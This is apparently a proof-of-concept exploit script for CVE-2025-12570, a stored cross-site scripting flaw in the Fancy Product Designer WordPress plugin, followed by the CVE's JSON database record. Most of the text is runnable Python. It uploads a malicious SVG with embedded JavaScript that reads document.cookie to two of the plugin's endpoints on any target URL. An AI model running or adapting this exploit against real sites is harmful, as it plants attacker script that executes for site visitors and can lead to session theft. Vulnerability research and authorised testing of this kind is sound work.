CVE-2025-12570

#!/usr/bin/env python3 # CVE-2025-12570 PoC - Fancy Product Designer SVG Upload Stored XSS # Author: Security Researcher # Note: This PoC is for educational and authorized testing purposes only import requests import sys # Malicious SVG payload with XSS XSS_PAYLOAD = '''<?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="300" height="200"> <script type="text/javascript"> alert('XSS - Cookie: ' + document.cookie); </script> <rect x="10" y="10" width="100" height="100" fill="red" /> <text x="50" y="50" fill="white">Pwned</text> </svg>''' def exploit_cve_2025_12570(target_url): """ Exploit stored XSS via SVG upload in Fancy Product Designer """ print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-12570...") # Upload endpoint (typically in wp-content/uploads/) upload_url = f"{target_url}/wp-content/plugins/fancy-product-designer/inc/data-to-image.php" # Alternative endpoint alt_upload_url = f"{target_url}/wp-content/plugins/fancy-product-designer/inc/pdf-to-image.php" files = { 'file': ('malicious.svg', XSS_PAYLOAD, 'image/svg+xml') } try: print(f"[+] Attempting upload to {upload_url}") response = requests.post(upload_url, files=files, timeout=10) if response.status_code == 200: print("[+] Upload successful!") print(f"[!] Access the uploaded SVG to trigger XSS") print(f"[!] URL: {response.url or upload_url}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python3 {sys.argv[0]} <target_url>") print(f"Example: python3 {sys.argv[0]} http://victim.com") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_cve_2025_12570(target)

{"cve": {"id": "CVE-2025-12570", "sourceIdentifier": "[email protected]", "published": "2025-12-12T07:15:42.980", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 6.4.8 due to insufficient input sanitization and output escaping in the data-to-image.php and pdf-to-image.php files. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://codecanyon.net/item/fancy-product-designer-woocommercewordpress/6318393", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2db4eb1d-3a82-4f0f-b4ff-a291b0289b7f?source=cve", "source": "[email protected]"}]}}